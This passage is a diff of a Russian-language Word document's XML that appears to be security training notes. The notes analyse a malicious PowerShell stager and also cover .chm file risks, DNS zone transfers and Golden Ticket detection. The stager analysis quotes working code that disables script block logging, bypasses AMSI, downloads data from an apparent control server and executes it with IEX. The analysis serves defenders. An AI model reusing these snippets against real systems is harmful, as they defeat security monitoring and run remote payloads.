           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> $GPF=[REF</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve"> $WC=New-Object System.Net.WebClient; $u='Mozilla/5.0(Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'; $WC.Headers.Add('User-</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>].Assembly.GetType</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Agent',$u); Создается новый веб-клиент, и добавляется строка user-agent для имитации легитимного веб-браузера. Это обычно используется для избежания обнаружения при выполнении веб-запросов. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','NonPublic,Static'); Эта строка извлекает непубличное статическое поле, которое содержит кэшированные параметры групповой политики. Затем он проверяет, включено ли ведение журнала блоков скриптов, и отключает его. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">6. </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3. </w:t>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Загрузка данных powershell</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3779,683 +3504,49 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">Изменение реестра </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>:</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        </w:rPr>
+        <w:t xml:space="preserve"> $DAtA=$WC.DownloadData($SER+$T); Скрипт создает URL-адрес и загружает с него данные. Похоже, он подключается к локальному IP-адресу (10.6.100.123), что может указывать на сервер управления и контроля или другой вредоносный источник. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>']=</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve">7. </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">$Val Скрипт изменяет параметры реестра, связанные с ведением журнала блоков скриптов </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Расшифровка и выполнение данных powershell</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">, эффективно отключая функции ведения журнала, которые обычно регистрируют выполнение скрипта. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">4. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Обход</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> AMSI:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> [Ref</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>].</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Assembly.GetType</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>('</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>System.Management.Automation.AmsiUtils</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">') | ?{$_} | %{ $_.GetField('amsiInitFailed','NonPublic,Static').SetValue($NULL,$True) }; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>Эта</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>часть</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>пытается</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>обойти</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>интерфейс</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>сканирования</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>вредоносных</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>программ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (AMSI), </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>устанавливая</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>поле</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>которое</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>указывает</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>на</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>сбой</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>инициализации</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> AMSI. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Это часто делается во вредоносных скриптах, чтобы избежать обнаружения программным обеспечением безопасности. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">5. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Инициализация веб-клиента </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $WC=New-Object </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>System.Net.WebClient</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">; $u='Mozilla/5.0(Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>like</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>Gecko</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>'; $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>WC.Headers.Add</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>('</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>User-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Agent</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>',$</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>u</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">); Создается новый веб-клиент, и добавляется строка </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>user-agent</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> для имитации легитимного веб-браузера. Это обычно используется для избежания обнаружения при выполнении веб-запросов. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">6. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Загрузка данных </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>DAtA</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>=$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>WC.DownloadData</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">($SER+$T); Скрипт создает URL-адрес и загружает с него данные. Похоже, он подключается к локальному IP-адресу (10.6.100.123), что может указывать на сервер управления и контроля или другой вредоносный источник. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">7. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Расшифровка и выполнение данных </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>join</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> [</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>Char</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>]](&amp;$R $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>datA</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>($IV+$K)) | IEX Загруженные данные обрабатываются с помощью пользовательской функции расшифровки ($R) и выполняются с помощью IEX (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>Invoke-Expression</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">). Это распространенный метод запуска динамически сгенерированных или загруженных скриптов. </w:t>
+        <w:t xml:space="preserve"> -join [Char[]](&amp;$R $datA($IV+$K)) | IEX Загруженные данные обрабатываются с помощью пользовательской функции расшифровки ($R) и выполняются с помощью IEX (Invoke-Expression). Это распространенный метод запуска динамически сгенерированных или загруженных скриптов. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4532,21 +3623,7 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">Такое поведение типично для вредоносных программ или других вредоносных скриптов, нацеленных на использование </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> для несанкционированных действий.</w:t>
+        <w:t>Такое поведение типично для вредоносных программ или других вредоносных скриптов, нацеленных на использование PowerShell для несанкционированных действий.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4667,44 +3744,20 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Почему файлы с расширением «</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>» могут быть опасны?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Файлы с расширением «.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>» (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Compiled</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> HTML Help) могут представлять опасность по нескольким причинам:</w:t>
+        <w:t>Почему файлы с расширением «chm» могут быть опасны?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Файлы с расширением «.chm» (Compiled HTML Help) могут представлять опасность по нескольким причинам:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4739,13 +3792,8 @@
         </w:rPr>
         <w:t>Загрузка внешнего контента</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Они</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> могут ссылаться на внешние ресурсы, что позволяет загружать содержимое с других сайтов, включая потенциально вредоносные файлы.</w:t>
+      <w:r>
+        <w:t>: Они могут ссылаться на внешние ресурсы, что позволяет загружать содержимое с других сайтов, включая потенциально вредоносные файлы.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4845,15 +3893,7 @@
         <w:t>Сбор информации</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: Злоумышленники могут использовать AXFR-запросы для сбора информации о вашем домене, включая все </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>поддомены</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, IP-адреса и другие записи. Эта информация может быть использована для планирования атак.</w:t>
+        <w:t>: Злоумышленники могут использовать AXFR-запросы для сбора информации о вашем домене, включая все поддомены, IP-адреса и другие записи. Эта информация может быть использована для планирования атак.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4871,13 +3911,8 @@
         </w:rPr>
         <w:t>Уязвимости</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Если</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ваш DNS-сервер неправильно настроен и разрешает AXFR-запросы от неавторизованных IP, это создает уязвимость. Злоумышленник может получить доступ к конфиденциальной информации.</w:t>
+      <w:r>
+        <w:t>: Если ваш DNS-сервер неправильно настроен и разрешает AXFR-запросы от неавторизованных IP, это создает уязвимость. Злоумышленник может получить доступ к конфиденциальной информации.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4895,15 +3930,7 @@
         <w:t>Атаки на инфраструктуру</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: Получив полную зону, злоумышленник может анализировать вашу инфраструктуру, выявлять слабые места и разрабатывать стратегии для дальнейших атак, таких как </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>DDoS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> или фишинг.</w:t>
+        <w:t>: Получив полную зону, злоумышленник может анализировать вашу инфраструктуру, выявлять слабые места и разрабатывать стратегии для дальнейших атак, таких как DDoS или фишинг.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4931,31 +3958,7 @@
         <w:t>DNS-сервер</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> не защищен должным образом, что может привести к другим атакам, таким как </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>spoofing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> или </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cache</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>poisoning</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve"> не защищен должным образом, что может привести к другим атакам, таким как spoofing или cache poisoning.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5004,36 +4007,20 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Как обнаружить атаку Golden </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ticket</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
-      </w:r>
